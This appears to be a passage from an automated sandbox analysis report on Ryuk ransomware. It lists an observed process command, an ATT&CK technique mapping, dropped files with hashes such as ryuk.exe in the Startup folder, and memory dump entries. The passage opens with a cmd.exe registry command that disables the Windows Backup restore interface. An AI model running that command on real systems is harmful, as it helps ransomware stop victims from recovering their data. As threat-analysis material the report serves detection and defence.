C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1932

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3544

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
3d1b99acb27c0126675e74e0d860c057

SHA1
ec8fcf47774cb63cc44d042a12c961cce03933a4

SHA256
4ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53

SHA512
6df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
3cfd6ef3b2825aa6ce421e10604ff452

SHA1
7c7c75df4105d3b0d69d1e03220f4d24644a8bde

SHA256
65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

SHA512
d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
d32a13d2a39fd672ab06cda60eace717

SHA1
ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e

SHA256
18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437

SHA512
e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
d32a13d2a39fd672ab06cda60eace717

SHA1
ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e

SHA256
18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437

SHA512
e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
38eb014bc309be66dd2eb004f8fb6fb0

SHA1
ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe

SHA256
d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582

SHA512
67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
38eb014bc309be66dd2eb004f8fb6fb0

SHA1
ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe

SHA256
d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582

SHA512
67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
3d1b99acb27c0126675e74e0d860c057

SHA1
ec8fcf47774cb63cc44d042a12c961cce03933a4

SHA256
4ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53

SHA512
6df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
d32a13d2a39fd672ab06cda60eace717

SHA1
ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e

SHA256
18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437

SHA512
e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
38eb014bc309be66dd2eb004f8fb6fb0

SHA1
ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe

SHA256
d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582

SHA512
67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
35194c73ff38dd6c3bed7c0efcff6826

SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

Download Submit
memory/116-185-0x0000000000000000-mapping.dmp

Download
memory/1048-190-0x0000000000000000-mapping.dmp

Download
memory/1084-182-0x0000000000000000-mapping.dmp

Download
memory/1240-201-0x0000000000000000-mapping.dmp

Download
memory/1424-200-0x0000000000000000-mapping.dmp

Download
memory/1428-199-0x0000000000000000-mapping.dmp

Download
memory/1712-152-0x0000000000000000-mapping.dmp

Download
memory/1776-184-0x0000000000000000-mapping.dmp

Download
memory/1796-192-0x0000000000000000-mapping.dmp

Download
memory/1828-153-0x0000000000000000-mapping.dmp

Download
memory/1976-203-0x0000000000000000-mapping.dmp

Download
memory/1984-151-0x0000000000000000-mapping.dmp

Download
memory/2008-171-0x0000000000000000-mapping.dmp

Download
memory/2040-134-0x0000000000000000-mapping.dmp

Download
memory/2056-169-0x0000000000000000-mapping.dmp

Download
memory/2084-154-0x0000000000000000-mapping.dmp

Download
memory/2140-138-0x0000000000000000-mapping.dmp

Download
memory/2152-189-0x0000000000000000-mapping.dmp

Download
memory/2212-206-0x0000000000000000-mapping.dmp

Download
memory/2376-204-0x0000000000000000-mapping.dmp

Download
memory/2540-137-0x0000000000000000-mapping.dmp

Download
memory/2708-146-0x0000000000000000-mapping.dmp

Download
memory/2896-202-0x0000000000000000-mapping.dmp

Download
memory/2920-132-0x0000000000000000-mapping.dmp

Download
memory/3040-136-0x0000000000000000-mapping.dmp

Download
memory/3060-187-0x0000000000000000-mapping.dmp

Download
memory/3060-156-0x0000000000000000-mapping.dmp

Download
memory/3148-164-0x0000000000000000-mapping.dmp

Download
memory/3292-143-0x0000000000000000-mapping.dmp

Download
memory/3392-188-0x0000000000000000-mapping.dmp

Download
memory/3460-175-0x0000000000000000-mapping.dmp

Download
memory/3476-149-0x0000000000000000-mapping.dmp

Download
memory/3484-183-0x0000000000000000-mapping.dmp

Download
memory/3540-174-0x0000000000000000-mapping.dmp

Download
memory/3544-176-0x0000000000000000-mapping.dmp

Download
memory/3592-173-0x0000000000000000-mapping.dmp

Download
memory/3600-133-0x0000000000000000-mapping.dmp

Download
memory/3696-194-0x0000000000000000-mapping.dmp

Download
memory/3708-145-0x0000000000000000-mapping.dmp

Download
memory/3752-157-0x0000000000000000-mapping.dmp

Download
memory/3784-198-0x0000000000000000-mapping.dmp

Download
memory/3912-191-0x0000000000000000-mapping.dmp

Download
memory/3940-165-0x0000000000000000-mapping.dmp

Download
memory/4052-178-0x0000000000000000-mapping.dmp

Download
memory/4088-161-0x0000000000000000-mapping.dmp

Download
memory/4168-179-0x0000000000000000-mapping.dmp

Download
memory/4208-139-0x0000000000000000-mapping.dmp

Download
memory/4240-155-0x0000000000000000-mapping.dmp

Download
memory/4244-160-0x0000000000000000-mapping.dmp

Download
memory/4276-196-0x0000000000000000-mapping.dmp

Download
memory/4340-186-0x0000000000000000-mapping.dmp

Download
memory/4360-180-0x0000000000000000-mapping.dmp

Download
memory/4392-148-0x0000000000000000-mapping.dmp

Download
memory/4408-197-0x0000000000000000-mapping.dmp

Download
memory/4476-181-0x0000000000000000-mapping.dmp

Download
memory/4808-195-0x0000000000000000-mapping.dmp

Download
memory/4860-144-0x0000000000000000-mapping.dmp

Download
memory/4896-142-0x0000000000000000-mapping.dmp

Download
memory/4908-177-0x0000000000000000-mapping.dmp

Download
memory/4952-205-0x0000000000000000-mapping.dmp

Download
memory/4964-140-0x0000000000000000-mapping.dmp

Download
memory/4992-150-0x0000000000000000-mapping.dmp

Download
memory/5008-193-0x0000000000000000-mapping.dmp

Download
memory/5060-147-0x0000000000000000-mapping.dmp

Download